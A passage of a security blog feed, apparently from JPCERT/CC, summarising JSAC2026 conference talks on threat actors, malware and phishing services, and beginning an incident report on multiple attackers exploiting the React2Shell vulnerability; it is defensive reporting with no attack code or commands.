<p>Next, he explained the structure of the ext4 and XFS journals and how to analyze them, showing how operations such as file creation and deletion can be inferred from the metadata changes recorded per transaction and reconstructed in chronological order. He also noted that although the specifications are public, no open-source tool could practically analyze both file systems and visualize the result as a timeline; existing tools such as The Sleuth Kit only enumerate the data.</p> <p>He then demonstrated FJTA detecting file activity from the journal and making visible attack traces that a conventional timeline would miss, and touched on applying the tool to real attack scenarios and on the limits of anti-forensics.</p> <p>Finally, he argued that file system journals are highly reliable forensic artifacts that are hard to tamper with, and recommended collecting the journal as a priority right after acquiring a memory image during incident response, ahead of block device analysis and ordinary file collection.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_1.jpg" alt="JSAC2026_Day2_1.JPG" /></p> <h3>Unmasking the CoGUI Phishing Kit, the Major Chinese Phishing-as-a-Service Targeting Japan</h3> <h5>Speakers: Shadow Liu, Lime Chen, Albert Song, TeamDonut</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_2_%20shadow_liu-lime_chen-albert_song_en.pdf">Slides (English)</a></p> <p>Shadow Liu, Lime Chen and Albert Song spoke about "CoGUI", a phishing operation targeting many Japanese brands in finance, transportation and government services, and the realities of "FishingMaster (垂钓大师)", the China-based Phishing-as-a-Service (PhaaS) behind it.</p> <p>They first outlined the current state of large-scale phishing against Japan and revealed that CoGUI is operated by the China-based FishingMaster. Because FishingMaster's advertising and sales have been confined to closed channels, its true nature long remained unknown; by comparing the evolution from the first generation to its successor system, and through web scanner data, monitoring of underground communities and technical investigation, the speakers systematically uncovered the infrastructure and operational ecosystem behind CoGUI.</p> <p>Next, they described how, after temporarily halting operations in 2025 in response to media coverage, the service rebranded as NX and FA and continued operating while hiding its infrastructure, encrypting communications and strengthening its detection-evasion features.</p> <p>They also shared attribution findings and behavioral patterns in underground markets, and examined the business model and risk-management strategy.</p> <p>Finally, they analyzed that the operators tend to scale back quickly under legal pressure or enforcement, so psychological vulnerability can be a weak point, and said that identifying URL and API patterns, tracking related infrastructure and practicing threat hunting are important for defenders.</p> <h3>The Mechanism for Building a Phishing Admin Panel</h3> <h5>Speaker: Masaomi Masumoto, NTT DOCOMO BUSINESS, Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_3_masaomi_masumoto_jp.pdf">Slides (Japanese)</a><br> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_3_masaomi_masumoto_en.pdf">Slides (English)</a></p> <p>Mr. Masumoto spoke about how phishing admin panels are built and what they do, against the backdrop of the rise of Phishing-as-a-Service (PhaaS).</p> <p>He first explained how the spread of PhaaS has lowered the technical bar for phishing and made attacks more efficient, and the background to the emergence of admin panels. Recent panels allow centralized operation of everything from creating and configuring phishing sites, managing stolen data, cloaking settings and domain management to bypassing one-time passwords.</p> <p>Next, he explained how the panels are built and how they work technically, noting that they are designed to be set up and torn down quickly using Docker and automated install scripts. The attack infrastructure prioritizes immediacy and efficiency over persistence, and analyzing the build tooling also reveals information about the infrastructure in use.</p> <p>Using cases such as CoGUI and Oriental Gudgeon, he analyzed the domains and URL structures the panels depend on and showed that PhaaS infrastructure effectively relies on a single URL or domain. Given this heavy dependence, he pointed out that blocking those URLs or domains could bring the entire service to a halt.</p> <p>Finally, he said that anti-phishing efforts should identify and take down the admin panel itself, not just individual sites, and that understanding how panels work and are built is the first step.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_3.jpg" alt="JSAC2026_Day2_3.JPG" /></p> <h3>Combatting residential proxy services in Japan: Part II</h3> <h5>Speakers: Yuji Ino, Recruit Co., Ltd.; Paul Ziegler, Reflare, Ltd.</h5> <p><br> In his JSAC2022 talk <a href="https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_3_ino_jp.pdf">"Combatting Malicious Proxy Services in Japan"</a>, Mr. Ino spent a year collecting and analyzing the exit IP addresses of 911, then the largest such service, and explained the difficulty of detecting residential IP proxies that ride on home Internet connections and of IP-address-based reputation scoring.</p> <p>In this talk, together with Paul Ziegler, he presented an update on three years of research since JSAC2022, covering the latest trends in residential proxies, how they are abused and detection techniques, based on continuous surveys of domestic IP addresses. Because much of the talk was TLP:RED, details are omitted here.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_4_01.jpg" alt="JSAC2026_Day2_4_01.JPG" /></p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_4_02.jpg" alt="JSAC2026_Day2_4_02.JPG" /></p> <h3>A deep-dive into RapperBot C2 operation and DDoS attacks</h3> <h5>Speaker: Hideyuki Furukawa, National Institute of Information and Communications Technology (NICT)</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_5_hideyuki-furukawa_en.pdf">Slides (English)</a></p> <p>Mr. Furukawa presented an analysis of the C2 operations and DDoS attacks of RapperBot, a DDoS botnet targeting IoT devices, which had not previously been reported in detail.</p> <p>He first gave an overview of RapperBot, which mainly infects DVRs and network cameras and spreads via multiple scanners. Research ongoing since 2022, using darknet monitoring and honeypot data, confirmed many infections in Taiwan, the United States, Japan and elsewhere and revealed the large scale of the C2 server operation.</p> <p>Next, he described attack trends with concrete examples, including the coincidence between the intermittent outages of X (formerly Twitter) in March 2025 and the timing of RapperBot's DDoS attacks, and concentrated attacks on Chinese online-game servers. He also analyzed the malware structure, C2 protocol specification, server rotation and how the UI was operated, reporting that the C2 control panel may have been driven by macros or from a console, and that operator mistakes and inefficient configurations were present.</p> <p>Based on roughly five months of data prior to the operator's arrest, he summarized the C2 operations, the details of attack commands and targeting trends, and recounted how a blacklist function blocked repeat attacks, ultimately leading to the communications being shut down and the operator arrested.</p> <p>Finally, he said that understanding the reality of large-scale IoT botnets is essential to understanding the threat, and that reducing the number of vulnerable IoT devices is the fundamental countermeasure.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_5.jpg" alt="JSAC2026_Day2_5.JPG" /></p> <h3>Unraveling the WSUS Exploit Chain: Incident Analysis and Actor Insights</h3> <h5>Speakers: Shohei Iwata, Teruki Yoshikawa, NTT Security Japan</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_6_shohei_iwata-teruki_yoshikawa_en.pdf">Slides (English)</a></p>
<p>Mr. Iwata and Mr. Yoshikawa shared how they analyzed an intrusion exploiting the WSUS RCE vulnerability (CVE-2025-59287) and identified its starting point, including the hypothesis-driven deep-dive investigation that began with insights from daily intelligence gathering and the attribution reasoning based on evidence of the TTP of abusing Velociraptor, offering a practical reference case for incident response and suggestions for revisiting countermeasures in light of threat trends.</p> <p>They first outlined the case, observed in their SOC in October 2025, in which a Japanese company was attacked through the WSUS RCE vulnerability (CVE-2025-59287). The intrusion started from the WSUS RCE vulnerability, and Velociraptor, a legitimate forensic/DFIR tool, was abused as an RMM tool. Initially there was no information on the infection vector and the true origin of the attack was hard to pin down from EDR evidence alone, but by correlating process trees and network IoCs starting from several detected alerts, they traced the deployment of Velociraptor via an MSI installer and concluded that the WSUS RCE vulnerability (CVE-2025-59287) was most likely used for initial access.</p> <p>Next, they laid out the attack flow and the tools used, and established that multiple incidents were the work of the same actor based on commonalities such as the Velociraptor configuration file and PKI setup, the hosting server's domain, MSI file names and AWS account names.</p> <p>Finally, they recommended strengthening detection and reviewing configurations in light of this case, and shared practical lessons from the incident analysis.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_6_01.jpg" alt="JSAC2026_Day2_6_01.JPG" /></p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_6_02.jpg" alt="JSAC2026_Day2_6_02.JPG" /></p> <h3>Continuous Intrusion/Continuous Distribution: Tracking Fox’s Iterative Malspam Campaign</h3> <h5>Speaker: Satoshi Kamekawa, ITOCHU Cyber &amp; Intelligence Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_7_satoshi_kamekawa_en.pdf">Slides (English)</a></p> <p>Mr. Kamekawa spoke about a phishing campaign by Silver Fox against Japanese organizations observed from September to October 2025, presenting the characteristics of the suspicious emails, analysis of the attack infrastructure and technical analysis of the observed malware, organized by attack patterns across five periods.</p> <p>He first summarized the investigation: large volumes of phishing emails impersonating specific organizations were sent with URLs in the message body. Clicking the malicious URL led through a redirect site to download a loader, which then fetched additional payloads in a multi-stage chain.</p> <p>Next, along with the details of the infection chain, he pointed out contradictions in the implementation, such as checking for a Japanese-language environment while also refusing to run unless the environment is Chinese.</p> <p>He also explained that the attacker kept updating their tradecraft, for example compiling the malware and staging it on the C2 just before sending the phishing emails. The malware used was ValleyRAT and VShell; ValleyRAT had mostly been reported against organizations in China and Taiwan, with few cases targeting Japan, so its use against Japan in this campaign suggests the actor may be expanding its scope of activity.</p> <p>Finally, citing the similarity of the malware and overlaps with past activity, he said Silver Fox is suspected to be involved, and recommended tighter monitoring of Japanese-language phishing emails, detection and blocking of anomalous communications, and continuous threat analysis.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_7.jpg" alt="JSAC2026_Day2_7.JPG" /></p> <h3>From Access to Encryption: Uncovering Qilin’s Attack Lifecycle</h3> <h5>Speaker: Takahiro Takeda, Cisco Talos</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_8_takahiro_takeda_en.pdf">Slides (English)</a></p> <p>Mr. Takeda focused on ransomware trends in Japan and the Qilin group, explaining the latest end-to-end attack chain and the current situation around initial access based on analysis of multiple incidents.</p> <p>He first showed that domestic ransomware cases in 2025 were on the rise, with small and medium-sized enterprises accounting for more than half, and that Qilin accounts for a significant share of domestic cases, far outweighing other groups.</p> <p>The group is also extremely active worldwide, expanding into the United States, Canada, China, South Korea and elsewhere and continuously publishing victims on its leak site.</p> <p>Next, he described Qilin's initial access in practice: intrusions mainly rely on leaked credentials obtained through encrypted messaging apps such as Telegram and Signal, marketplace forums and initial access brokers, after which the attack proceeds to reconnaissance, lateral movement, credential theft, abuse of RMM tools, and data theft and encryption.</p> <p>He also covered characteristic TTPs such as selective data theft using a mix of legitimate and custom tools, encryption of entire virtual environments via automated scripts, clearly divided roles and EDR evasion.</p> <p>Finally, because the time to encryption is short, he stressed early detection before the ransomware runs, recommending thorough log collection and MFA, offline backups, aggressive configuration of security products and stronger detection using Sigma and YARA rules, and concluded that continued and increasingly automated attacks remain a concern.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_8.jpg" alt="JSAC2026_Day2_8.JPG" /></p> <h3>Closing</h3> <p>This post covered the talks given on the second day of JSAC2026. The next JPCERT/CC Eyes post will cover the Workshops, Lightning Talk Sessions and Panel Discussion.</p> <p style="text-align: right;">Nanae Sasaki, Incident Response Group</p>
  44. JSAC2026 Event Report ~DAY 1~

    Fri, 20 Feb 2026 02:00:00 -0000

    JPCERT/CC held JSAC2026 from January 21 to 23, 2026 ...
    <p>JPCERT/CC held JSAC2026 from January 21 to 23, 2026. The conference brings security analysts together to share knowledge on incident analysis and response and to raise the overall level of technical skill. This ninth JSAC added training as a new initiative and ran for three days in total. Over the two conference days there were 17 talks, 3 workshops and 6 lightning talks. Slides are published on the <a href="https://jsac.jpcert.or.jp/timetable.html" title="" target="_blank">JSAC website</a> (some are not public). JPCERT/CC Eyes will cover the conference in three installments.</p> <p>This first installment covers the DAY 1 Main Track talks.</p> <h3>The Betrayed Update: Beyond the Signpost</h3> <h5>Speaker: Takahiro Yamamoto, ITOCHU Cyber &amp; Intelligence Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_1_yamamoto_jp.pdf" title="" target="_blank">Slides (Japanese)</a><br/> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_1_yamamoto_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Mr. Yamamoto shared the investigation steps and lessons learned from an incident, carried out by the threat actor Tropic Trooper, that was triggered by an update of a legitimate application.</p> <p>Lateral movement or a supply chain attack was suspected at first, but log analysis revealed that the configuration data pointing the legitimate application to its update location had been swapped, redirecting it to a malicious update server. Analysis across multiple cases found a common factor: the phenomenon reproduced only when connected to a particular home network, showing that the cause lay on the network side rather than on the endpoint. Analysis of data from sensors deployed on endpoints and from investigation scripts then revealed the full chain: a suspicious IP address had been set as the caching DNS server used by the home router, so name resolution was tampered with, only specific domains were directed to a fake update server, fake configuration data was downloaded from it, and malware was ultimately delivered and executed.</p> <p>As countermeasures he listed forcing the use of trusted DNS servers via a full-tunnel VPN or similar, using DNS over TLS (DoT) or DNS over HTTPS (DoH), which resist DNS hijacking, and the importance of endpoint detection and monitoring, concluding that incident analysis yields useful intelligence when it considers the structure of the event and the attacker's intent, not only the outcome.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_1-640wri.jpg" width="640" height="359" alt="" class="asset asset-image at-xid-4052852 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Knife Cutting the Edge: Dissecting A Gateway Surveillance &amp; MitM Framework</h3> <h5>Speaker: Chi-en "Ashley" Shen, Cisco Talos</h5> <p>Noting that routers and other edge devices have become key targets in surveillance and espionage campaigns, Chi-en "Ashley" Shen presented a framework that runs on gateway edge devices and enables traffic inspection and tampering. Because the talk was TLP:RED, details are omitted here.</p> <h3>The Return of Old Forces: Revealing New Campaigns Connected to A Missing Cyber Mercenary Firm</h3> <h5>Speaker: Joseph Chen, Trend Micro</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_3_joseph_chen_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Joseph Chen spoke about activity by Earth Lusca and Earth Krahang, two actors linked to the Chinese company i-Soon. i-Soon drew attention when internal documents leaked in February 2024, suggesting the company was involved in espionage and had ties to government agencies. Activity by both linked actors quieted after the leak, but he explained that they may have resumed operations in 2025.</p> <p>The PONDSNAKE campaign, observed from around October 2024, targeted government agencies as well as the financial sector, including insurance and securities. Initial compromise began with exploitation of vulnerabilities in public-facing servers or with spear-phishing emails, after which the attackers deployed SnakeC2, NEOBEACON (which abuses OneDrive/Microsoft Graph API for C2), Cobalt Strike, VShell and SoftEther VPN, among others. Based on commonalities such as the use of a SnakeC2 variant and the abuse of compromised government websites, attribution to Earth Krahang was assessed with medium to high confidence.</p> <p>The WILYCODE campaign, observed from around May 2025, targeted government, educational institutions and hospitals, mainly through vulnerabilities in public-facing servers such as React2Shell (CVE-2025-55182). The attackers also used open-source hacking tools and ran Cobalt Strike and VShell via the HyperBro Launcher. Although there is overlap in the HyperBro Launcher and C2 profiles, most of the observed TTPs are generic, so attribution to Earth Lusca was concluded to be low confidence.</p> <p>He concluded that when reuse of old tooling runs alongside the addition of new elements, judgments should rest on multiple independent pieces of evidence rather than on any single trace.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052853 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Attribution in Action: A Case Study of an Incident Involving Multiple Activity Clusters</h3> <h5>Speakers: Hiroaki Hara, Doel Santos, Palo Alto Networks</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_4_hiroaki_hara-doel_santos_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Hiroaki Hara and Doel Santos explained a method for advancing attribution step by step from observed facts, using a case in which three distinct activity clusters were active at the same time in a single organization's incident.</p> <p>One cluster, CL-STA-1048, carried out intrusions using RawCookie, EggStreme Loader, Gorem RAT and Masol RAT; while noting possible links to known groups such as Earth Estries, they assessed the confidence as low.</p>
<p>Next, for CL-STA-1049 they showed a flow starting from DLL proxy-sideloading by the Hypnosis Loader and leading to the deployment of FluffyGh0st and other tools, and, based on tool overlap, showed a strong link to Unfading Sea Haze.</p> <p>For Stately Taurus they covered HIUPAN, USBFect, the USB-spreading PUBLOAD and the CoolClient family of tools; although no direct execution chain between PUBLOAD and CoolClient could be confirmed, matching obfuscation techniques suggested a connection at the codebase level.</p> <p>Finally, they described performing attribution with a framework that evaluates source reliability and information credibility separately, and emphasized the Premier Pass-as-a-Service trend, in which campaigns are carried out through close coordination among multiple APT groups, and the importance of revisiting the attribution process within one's own organization.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_4-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052854 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Ghost in Your Network: How Earth Kurma Stays Hidden and Exfiltrates Your Data</h3> <h5>Speakers: Nick Dai, Sunny W Lu, Trend Micro</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_5_nick_dai_sunny-w-lu_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Nick Dai and Sunny W Lu presented their research on Earth Kurma, an APT group targeting government and telecommunications in Southeast Asia. Initial compromise starts from vulnerable web servers; after discovery and lateral movement, the group is characterized by choosing among several toolsets depending on the environment to achieve persistence and evade detection.</p> <p>For persistence, the group deploys a combination of rootkits, backdoors and loaders: MMLOAD unfolds in stages via reflective loading, KRNRAT injects a user-mode agent into svchost.exe to keep it resident in memory, and MORIYA was shown with a new injection method and EDR-evasion techniques. The Cisco Webex variant of DOWNBEGIN abuses multiple meeting rooms as C2 channels for different purposes.</p> <p>For exfiltration, beyond collection and compression with PowerShell, the attackers abuse legitimate cloud services such as OneDrive (ODRIZ), Dropbox (SIMPOBOXSPY) and Cisco Webex (SIMPOWEBEXSPY) to keep traces of the intrusion inconspicuous, and distributed file systems are also abused for both deployment and exfiltration. As countermeasures against Earth Kurma's TTPs, they proposed monitoring cloud traffic from unapproved applications, analyzing large internal transfers and anomalous paths, and preventing the installation of untrusted drivers.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_5-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052855 mt-image-left" style="display: inline-block; float: left"/></p> <h3>The Continuing Evolution of Tianwu's Pangolin8RAT Malware and Custom Cobalt Strike Beacon</h3> <h5>Speaker: Naoki Takayama, Internet Initiative Japan Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_6_naoki_takayama_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Naoki Takayama reported on the continuing evolution of Pangolin8RAT and a custom Cobalt Strike Beacon, two of the malware families associated with the China-linked APT group Tianwu.</p> <p>Starting from a sample uploaded to VirusTotal in September 2025, he laid out the execution chain: CoreX Loader is loaded by a legitimate process such as regsvr32.exe, decrypts data embedded in its resources using XOR and AES, and finally unpacks the Pangolin8RAT payload in memory. Pangolin8RAT is designed around extending its functionality by fetching plugins, and is notable for leaving few traces, with logs and some data deleted after a reboot. He also covered network characteristics such as abuse of Nutstore's WebDAV, custom-structured Cookies in HTTPS traffic and hiding the true destination by swapping the Host header, and showed evasion improvements including stronger string obfuscation, RTTI suppression and XOR-encoding of configuration data when specific processes are detected.</p> <p>On the Beacon side, improvements such as an embedded sleep-mask BOF and a changed configuration encoding were confirmed, while operational traces hinting at past configurations, such as old C2 information left in headers, allowed him to infer how development and operations are run.</p> <p>Finally, noting that the activity has continued since 2022 and may have resumed from at least around October 2024, he stressed the importance of continued monitoring through shared YARA/Sigma rules and IoCs.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_6-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052856 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti</h3> <h5>Speakers: Greg Chen, Sharon Liu, TeamT5</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_7_Greg_chen_Sharon_liu_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Greg Chen and Sharon Liu used a large-scale attack campaign against VPN/gateway products such as Ivanti Connect Secure (ICS) to explain incident response and investigation techniques for edge devices. As an overview of the campaign, they reported 170 compromised devices identified as intrusions involving the SPAWN family, spread across 25 regions and observed most often in Japan, Taiwan, South Korea and the United States.</p> <p>They then summarized the investigative constraints of Ivanti Connect Secure: the system partition is encrypted, administration is GUI-centric so logs and files are hard to inspect, and investigators tend to depend on the results of the vendor's integrity checker tool. Against that, they presented vendor-assisted analysis such as remote debugging, offline analysis of decrypted disk images, and, in a lab environment only, verification via the SSH management console. For identifying suspicious binaries, they showed the value of combining timestamp outliers, differences between static and dynamic linking and ELF metadata rather than relying solely on the integrity check's hash comparison.</p>
<p>Finally, they summarized the attack chain as starting from CVE exploitation and proceeding to TextDoor, an in-memory backdoor that hooks and hijacks TLS traffic, persistence via the SPAWN family, and credential theft via DebtTheft. They also stressed the importance of hunting for unknown victims through protocol analysis and network signatures, on the assumption that integrity checks will be evaded.</p> <h3>Infrastructure-less Adversary: C2 Laundering via Dead-Drop Resolvers and the Microsoft Graph API</h3> <h5>Speakers: Wei-Chieh Chao, Shih-Min Chan, CyCraft</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_8_wei-chieh_chao_shih-min_chan_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Wei-Chieh Chao and Shih-Min Chan used the case of a China-linked state-sponsored actor targeting Taiwanese government agencies and manufacturers to explain an "infrastructure-less" approach in which the attacker keeps its own infrastructure out of view and abuses legitimate communication platforms to establish C2.</p> <p>In the incident used as the case study, the attackers gained entry via phishing, escalated privileges by exploiting AD CS misconfigurations and similar weaknesses, moved laterally, set up remote access infrastructure such as SoftEther VPN, and then comb combined the Microsoft Graph API, C2 behind Cloudflare and compromised public websites serving as dead-drop resolvers. They emphasized how the attackers evaded detection by tampering with the AD logon script only briefly, distributing and executing it on all endpoints, and then immediately restoring it. The analysis covered three malware families: GRAPHBROTLI/GRAPHRELOOK, which repurpose the Microsoft Graph API for C2 and use the Outlook API for C2 communication, and RCREMARK, which communicates with C2 behind Cloudflare and executes commands retrieved from instructions embedded in HTML comments.</p> <p>They concluded that because of the brief modifications and the abuse of legitimate platforms, blocklist-centric defenses are ineffective, and that protecting and monitoring logon scripts and monitoring communications, including cloud API and web access, are important.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_8-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052857 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Konni’s New Arsenal: Unmasking GSRAT in North Korea-linked APT Operation</h3> <h5>Speakers: Takuma Matsumoto, Yoshihiro Ishikawa, LAC Co., Ltd.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_9_takuma_matsumoto-yoshihiro_ishikawa_en.pdf" title="" target="_blank">Slides (English)</a><br/></p> <p>Takuma Matsumoto and Yoshihiro Ishikawa explained attacks using GSRAT, an AutoIt-based RAT observed since February 2025, as activity associated with Konni, a threat actor believed to be linked to North Korea. In May 2025, spear-phishing emails posing as an affiliated company delivered links to organizations connected to domestic financial institutions.</p>
<p>The chain starts from a shortcut file disguised as a document inside the ZIP downloaded via spear phishing; an obfuscated script inside the LNK runs and displays a decoy while fetching and unpacking additional files, then runs AutoIt via VBS and BAT. Persistence is achieved through a Startup folder entry and a scheduled task, and GSRAT, embedded in a compiled AutoIt script, communicates with C2 for remote control.</p> <p>They summarized the characteristics of AutoIt: it can automate the Windows GUI and call APIs, and because it compiles to a standalone executable it has few dependencies and is relatively lightweight. They also introduced the encoding characteristics, including the EA06 format frequently seen recently, and how to extract the script. GSRAT sends an identifier generated from host-specific information along with its version, and provides basic functions such as a remote shell, file upload and download, enumeration, deletion and execution; variants were observed with changes such as JSON-formatted communication and the introduction of delimiters.</p> <p>Finally, citing the shift from Custom Lilith RAT to GSRAT and the characteristics of infrastructure operation as grounds for the link to Konni, they stressed detection with YARA/Sigma rules, monitoring with Autoruns and EDR, and restricting AutoIt execution with AppLocker or WDAC based on signature information.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_9-640wri.jpg" width="640" height="413" alt="" class="asset asset-image at-xid-4052858 mt-image-left" style="display: inline-block; float: left"/></p> <h3>Closing</h3> <p>This post covered the talks given on the first day of JSAC2026. The next JPCERT/CC Eyes post will cover the second day's talks.</p> <p style="text-align: right;">Tomoya Kamei, Incident Response Group</p>
  45. Compromise Cases Involving Multiple Threat Actors Exploiting React2Shell

    Fri, 13 Feb 2026 02:00:00 -0000

    On December 3, 2025 (local time), React Server Components...
    <p>On December 3, 2025 (local time), an unauthenticated remote code execution vulnerability in React Server Components (RSC) (<a href="https://www.jpcert.or.jp/newsflash/2025120501.html" target="_blank">CVE-2025-55182</a>) was disclosed. JPCERT/CC has received multiple reports of damage from attacks exploiting it. One of these was a case in which the vulnerability was exploited by multiple threat actors within a short period, with several kinds of damage, including website defacement, occurring at once. This post uses that case's attack timeline and the malware involved to show how quickly and indiscriminately attackers move once an easily exploitable vulnerability is published, and we hope it serves as a reference for how fast remediation must proceed when such a serious vulnerability is disclosed.</p> <h3>Attack Timeline</h3> <p>Table 1 shows the attack timeline established in this case. (Some URL paths and identifiers below are masked because they could identify the victim organization.)</p> <table border="1" width="100%"> <caption>Table 1: Attack timeline</caption> <thead> <tr> <th><div style="text-align: center;">Date/time (JST)</div></th> <th><div style="text-align: center;">Event</div></th> </tr> </thead> <tbody> <tr> <td align="left">2025-12-05 15:52</td> <td>Coin miner (sex.sh, xmrig) installed</td> </tr> <tr> <td align="left">2025-12-06 07:28</td> <td>Coin miner (sex.sh.1) installed</td> </tr> <tr> <td align="left">2025-12-06 09:53, 10:09, 11:00</td> <td>HISONIC backdoor (javax) installed</td> </tr> <tr> <td align="left">2025-12-06 15:00</td> <td>Global Socket (npm-cli) set to run hourly via cron</td> </tr> <tr> <td align="left">2025-12-06 19:31</td> <td>SNOWLIGHT downloader (javas) and CrossC2 (rsyslo) installed</td> </tr> <tr> <td align="left">2025-12-07 12:24</td> <td>Coin miner (xmrig) installed</td> </tr> <tr> <td align="left">2025-12-07 16:51</td> <td>cron configuration rewritten to run /tmp/kernal (disguised as "kernel") every minute</td> </tr> <tr> <td align="left">2025-12-07 19:46</td> <td>Website defaced (warning message displayed)</td> </tr> <tr> <td align="left">2025-12-07 22:15</td> <td>Discovered through a report from a service user</td> </tr> </tbody> </table> <p>Just two days after the React2Shell vulnerability was disclosed on December 3, 2025, an attack aimed at installing a coin miner took place, and from there multiple attackers installed and ran various malware including RATs and backdoors, leaving several attackers present on a single server at once. <br /> Beyond the timeline above, between December 5 and 7, 2025 the web server's access logs showed suspicious HTTP POST requests from more than 100 IP addresses that appear to have targeted the React2Shell vulnerability (inferred from the User-Agent, request path and response size, since the access logs did not record request headers or POST data), so the server may in fact have been compromised by even more attackers.</p> <h3>The Website Defacement That Triggered the Investigation</h3>
<p>The compromise came to light when a website user noticed that the site had been defaced and reported it. The defaced site displayed a warning in four languages to the effect that "the site is vulnerable to CVE-2025-55182 and needs to be patched immediately". Figure 1 shows an example of the defaced page.</p> <p><figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig1-640wri.png" width="800" height="347" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>Figure 1: Defaced web page</figcaption></figure></p> <p>The same defacement was confirmed on multiple websites both in Japan and abroad, all carrying text urging prompt remediation of the vulnerability. Figure 2 shows examples of defaced sites as displayed by a search engine.</p> <p><figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig2-640wri.png" width="800" height="398" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>Figure 2: Google search results</figcaption></figure></p> <h3>Installed Malware</h3> <p>A variety of malware and open-source tools were abused in this case. Table 2 lists the malware that had been installed (configuration files and similar excluded).</p> <table border="1" width="100%"> <caption>Table 2: Installed malware</caption> <thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">File name</div></th> <th><div style="text-align: center;">Description</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>sex.sh</td> <td>bash script that downloads xmrig</td> </tr> <tr> <td>2</td> <td>sex.sh.1</td> <td>bash script that downloads xmrig</td> </tr> <tr> <td>3</td> <td>miner.sh</td> <td>bash script that launches xmrig</td> </tr> <tr> <td>4</td> <td>xmrig</td> <td>xmrig coin miner</td> </tr> <tr> <td>5</td> <td>javax</td> <td>HISONIC backdoor</td> </tr> <tr> <td>6</td> <td>javas</td> <td>bash script that downloads SNOWLIGHT</td> </tr> <tr> <td>7</td> <td>rsyslo</td> <td>CrossC2 RAT</td> </tr> <tr> <td>8</td> <td>npm-cli</td> <td>Global Socket tool</td> </tr> <tr> <td>9</td> <td>kernal</td> <td>Details unknown (had been deleted)</td> </tr> </tbody> </table> <p>Interestingly, besides the usual financially motivated coin miners, we found a downloader for SNOWLIGHT<a href="#1">[1]</a>, reportedly used by UNC5174; the Golang-based HISONIC backdoor<a href="#2">[2]</a>, reportedly used by UNC6603; and CrossC2 RAT<a href="#3">[3]</a>, a Linux implementation of Cobalt Strike, which was installed at the same time as SNOWLIGHT. The attackers' precise objective is unknown, but they may have intended to use the server as a foothold for future attacks. <br /> We also confirmed abuse of the open-source tool Global Socket (gsocket)<a href="#4">[4]</a>, which is rarely seen in cases reported by other security vendors. The tool lets two hosts that cannot reach each other directly, for example behind NAT or a firewall, connect through a relay network called GSRN (Global Socket 